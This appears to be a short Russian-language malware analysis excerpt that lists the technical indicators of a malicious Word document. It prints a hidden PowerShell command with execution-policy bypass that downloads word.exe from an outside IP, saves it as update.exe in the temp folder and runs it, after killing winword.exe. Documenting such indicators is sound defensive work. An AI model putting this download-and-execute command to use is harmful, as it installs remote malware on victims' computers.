Техническая информация
- http://23.##9.161.109/word/word.exe как %temp%\update.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe&powershell -W Hidden -Exec Bypass (New-Object System.NeT.WeBClieNT).DownloadFile('http://23.##9.161.109/word/word.exe','%TEMP%\update.exe');Start-Process '%TEMP%\...
- '23.##9.161.109':80
- ClassName: '' WindowName: ''